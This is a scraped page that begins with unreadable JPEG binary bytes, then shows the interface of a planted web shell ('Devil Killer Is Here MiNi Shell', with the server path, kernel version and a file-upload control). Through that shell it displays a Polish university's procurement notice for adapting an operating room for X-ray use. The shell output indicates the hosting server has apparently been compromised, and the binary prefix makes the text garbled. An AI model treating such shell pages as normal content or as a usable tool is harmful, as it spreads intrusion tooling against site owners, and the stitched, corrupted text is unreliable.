JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250312/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250312/0014214301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Dostosowanie części pomieszczeń sali operacyjnej w budynku B4 Centrum Chirurgii Doświadczalnej na potrzeby wykonywania prześwietleń RTG , pl. Grunwaldzki 51,realizacja w formule zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET PRZYRODNICZY WE WROCŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001867</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cypriana Kamila Norwida 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-375</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zofia.golinska-zalewska@upwr.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.upwr.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostosowanie części pomieszczeń sali operacyjnej w budynku B4 Centrum Chirurgii Doświadczalnej na potrzeby wykonywania prześwietleń RTG , pl. Grunwaldzki 51,realizacja w formule zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-59eea4a9-2a2c-4f48-8edf-19cf9bf4d672</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00142143</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00053022/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Dostosowanie części pom. sali operacyjnej w budynku B4 Centrum Chirurgii Doświadczalnej na potrzeby wykonywania prześwietleń RTG (urządzenie RTG - ramię C), pl. Grunwaldzki 51</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://upwr.logintrade.net/zapytania_email,193017,b173cd061b2db4b7bb082bd349a5c19f.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest tylko za pośrednictwem Platformy Przetargowej: https://upwr.logintrade.net/zapytania_email,193017,b173cd061b2db4b7bb082bd349a5c19f.html<br/>(zwanej dalej: „Platformą”) pod adresem:</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne urządzeń<br/>informatycznych, niezbędnych do prawidłowego korzystania z Platformy opisane są na stronie:<br/>https://upwr.logintrade.net/reg,info,wymaganiatechniczne.html oraz https://upwr.logintrade.net/rejestracja/instrukcje.html<br/>Dopuszczalne przeglądarki internetowe: Edge, Google Chrome, Mozilla Firefox, Opera,<br/>Pozostałe wymagania techniczne:<br/>a) dostęp do sieci internet;<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>Instrukcje korzystania z Platformy dostępne są pod adresem:<br/>https://upwr.logintrade.net/rejestracja/instrukcje.html<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>Platformy, określone we wskazanej powyżej Instrukcji Użytkownika oraz zobowiązuje się korzystając z Platformy przestrzegać<br/>postanowień tej Instrukcji.<br/>Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj.: Logintrade SA ul. Legnicka 57D, lokal<br/>B/J, 54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8:00 –<br/>16:00.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania nadanym przez Zamawiającego A0CZZ000.240.14.2025<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, tj. przy użyciu Platformy wskazanej w SWZ.<br/>Pozostałe wymagania techniczne i organizacyjne określono w rozdz. 10 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określono w rozdz. 29 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Określono w rozdz. 29 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">A0CZZ000.240.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Dostosowanie części pomieszczeń sali operacyjnej w budynku B4 Centrum Chirurgii Doświadczalnej na potrzeby wykonywania prześwietleń RTG (urządzenie RTG - ramię C), pl. Grunwaldzki 51 - realizacja w<br/>formule “zaprojektuj i wybuduj”<br/>3. Zamówienie należy wykonać zgodnie z:<br/>Programem funkcjonalno-użytkowym wraz z załącznikami do PFU (zał. 1 - 7)<br/>Ekstraktem z dokumentacji technicznej (dokumentacji techniczna ochrony radiologicznej)<br/>Tabelą Zbiorczego Zestawienia Robót.<br/>4. Wymagania ogólne:<br/>4.1. Wykonawca w ramach realizacji zamówienia wykona:<br/>a) dokumentację projektową, w zakresie niezbędnym do zrealizowania robót budowlanych objętych przedmiotem<br/>zamówienia, zgodnie z PFU (pkt. 1), obejmującą:<br/>opracowanie niezbędnych inwentaryzacji budowlano-instalacyjnych<br/>wykonanie projektu architektonicznego (aranżacji z lokalizacją urządzenia)<br/>opracowanie dla pomieszczenia RTG projektu osłon stałych i ruchomych dla wybranego aparatu cyfrowego wraz z<br/>obliczeniami<br/>opracowanie projektów wykonawczych dostosowania cz. pomieszczenia do pracy z urządzeniem RTG, w oparciu o<br/>obowiązujące przepisy oraz wymagania określone przez dostawcę aparatu cyfrowego RTG z dostosowaniem instalacji<br/>elektrycznych, teletechnicznych i połączeń prądoprzewodzącej posadzki do nowej aranżacji, potrzeb urządzenia RTG i<br/>możliwych do wystąpienia kolizji,<br/>opracowanie Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych<br/>uzyskanie wynikających z przepisów opinii, uzgodnień, decyzji, zgód i zatwierdzeń oraz odstępstw od obowiązujących<br/>przepisów (jeżeli zajdzie taka konieczność), jak również przeprowadzenie wymaganych badań, sprawdzeń, pomiarów, itd.<br/>niezbędnych do należytego wykonania przedmiotu zamówienia,<br/>sprawowanie nadzoru autorskiego w trakcie realizacji robót budowlanych na podstawie opracowanej dokumentacji<br/>projektowej<br/>b) pełen zakres robót budowlanych, o których mowa w lit. a powyżej na podstawie opracowanej dokumentacji projektowej.<br/>Wykonawca zobowiązuje się wykonać roboty budowlane zgodnie z wymaganiami ustawy Prawo budowlane oraz zgodnie z<br/>innymi obowiązującymi przepisami i normami, jak również zgodnie z zasadami wiedzy technicznej, sztuką budowlaną i<br/>przepisami BHP.<br/>Wykonane roboty mają umożliwić uzyskanie przez Zamawiającego zezwolenia Prezesa Państwowej Agencji Atomistyki.<br/>Roboty budowlane będą realizowane na czynnym obiekcie Uczelni w trakcie trwania roku akademickiego.<br/>Zamawiający wymaga, aby Wykonawca udzielił gwarancji i rękojmi na przedmiot zamówienia, na okres co najmniej 36<br/>miesięcy. Długość gwarancji stanowi jedno z kryterium oceny ofert i może ulec wydłużeniu na warunkach określonych w<br/>Rozdziale 17 SWZ.<br/>Termin wykonania zamówienia: do 17 tygodni od daty zawarcia umowy, z uwzględnieniem terminów pośrednich:<br/>1.1. wykonanie dokumentacji projektowej (zatwierdzonej przez Zamawiającego), wskazanej w programie funkcjonalnoużytkowym<br/>- do 4 tyg. od daty zawarcia umowy<br/>1.2. przekazanie placu budowy w terminie do 1 tyg. od daty zatwierdzenia dokumentacji projektowej<br/>1.3. realizacja robót budowlanych do 8 tygodni od daty przekazania placu budowy, potwierdzona złożeniem pisemnego<br/>wniosku zgłoszenia o gotowości do odbioru robót,<br/>1.4. rozpoczęcie czynności odbiorowych w terminie do 1 tygodnia od daty skutecznego złożenia wniosku o dokonanie<br/>odbioru końcowego,<br/>1.5. zakończenie czynności odbiorowych w terminie do 1 tygodnia od daty ich rozpoczęcia.<br/>Szczegółowy zakres i warunki realizacji zamówienia określono w PFU z załącznikami oraz w projektowanych<br/>postanowieniach umowy - załącznik nr 6 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">119 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w wysokości 15 % szacunkowej wartości<br/>zamówienia podstawowego.<br/>2. Zamówieniami tymi objęty będzie następujący zakres: wykonanie prac budowlanych i konstrukcyjnych, instalacji elektrycznych,<br/>instalacji sanitarnych, wentylacji w związku z dostosowaniem pomieszczenia sali operacyjnej do pracy z urządzeniem RTG (B4, pl.<br/>Grunwaldzki 51).<br/>3. Zamawiający udzieli zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 w związku z art. 305 pkt 1 ustawy Pzp, jeżeli 3.1. Wykonawca będzie wykonywał/ wykona należycie zamówienie podstawowe,<br/>3.2. Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 w związku z art. 305 pkt 1 ustawy Pzp, w<br/>standardzie nie gorszym niż zamówienie podstawowe.<br/>3.3. Strony w ramach prowadzonych negocjacji dojdą do porozumienia co do ceny i terminu wykonania zamówienia, o którym mowa<br/>w art. 214 ust.1 pkt 7 w związku z art. 305 pkt 1 ustawy Pzp.<br/>3.4. Zamawiający będzie dysponował środkami finansowymi na realizację zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 w<br/>związku z art. 305 pkt 1 ustawy Pzp.<br/>3.5. Wykonawca przed udzieleniem zamówienia złoży oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, dotyczące braku<br/>przesłanek wykluczenia z postępowania w zakresie takim, jak określono w postępowaniu dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów określonych w rozdz. 17 SWZ.<br/>Zamawiający dokona oceny ofert, przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% =<br/>1pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu;<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu;<br/>1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu;<br/>1.4. zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>1.4.1. należycie zrealizował w okresie ostatnich 7 lat wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 (jedną) robotę budowlaną, która:<br/>a) obejmowała wykonanie robót ogólnobudowlanych;<br/>b) miała wartość co najmniej 100 000 zł brutto,<br/>wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania, oraz przedstawi dokumenty potwierdzające że roboty te<br/>zostały wykonane w sposób należyty tj. czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo<br/>ukończone.<br/>Wyjaśnienie:<br/>a) przez pojęcie jednej roboty budowlanej należy rozumieć jedną umowę (kontrakt), w ramach której Wykonawca<br/>zrealizował roboty ogólnobudowlane o łącznej wartości co najmniej 100 000 zł brutto;<br/>b) do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs przeliczeniowy przyjmie średni<br/>kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym:<br/>https://nbp.pl/statystyka-i-sprawozdawczosc/kursy/<br/>c) Okres wyrażony w latach, o których mowa powyżej, liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>1.4.2. do realizacji zamówienia skieruje:<br/>a) osobę, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno-budowlanej;<br/>b) osobę, która posiada uprawnienia inspektora ochrony radiologicznej<br/>c) osobę, która posiada uprawnienia budowlane do projektowania w specjalności architektonicznej<br/>Wyjaśnienie:<br/>Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza<br/>uprawnienia wydane na podstawie przepisów ustawy Prawo budowlane z dnia 7.07.1994 r. lub odpowiadające im ważne<br/>uprawnienia budowlane wydane na podstawie wcześniej obowiązujących aktów prawnych. Dopuszcza się również<br/>odpowiadające im uprawnienia, wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>2. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 ustawy Pzp<br/>oraz art. 7 Ustawy sankcyjnej. Wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia podmiotowych<br/>środków dowodowych, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy<br/>wykluczenia z postępowania. Zamawiający nie żąda podmiotowych środków dowodowych od podwykonawcy, który nie jest<br/>podmiotem udostępniającym zasoby na zasadach określonych w art. 118 ustawy Pzp</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz<br/>robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie<br/>dokumenty.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami,<br/>wykaz dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>Okres wyrażony w latach lub miesiącach, liczy się wstecz od dnia, w którym upływa termin składania ofert. Wzór wykazu stanowi<br/>Załącznik nr 5 do SWZ.<br/>2. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami Wzór wykazu osób stanowi<br/>Załącznik nr 5a do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wyłącznie w przypadku oferowania rozwiązań równoważnych:<br/>Zamawiający żąda złożenia następujących przedmiotowych środków dowodowych wraz z ofertą, o których mowa w art. 106<br/>ust. 1 ustawy Pzp, potwierdzających spełnianie przez oferowane rozwiązania wymagań określonych przez Zamawiającego:<br/>a) specyfikacji technicznej producenta odpowiednio produktu/sprzętu/elementu/podzespołu/procesu potwierdzającej, że<br/>oferowany odpowiednio produkt/sprzęt/element/podzespół/proces równoważny posiada parametry przynajmniej na poziomie<br/>takim jak wymaga Zamawiający.<br/>b) certyfikaty 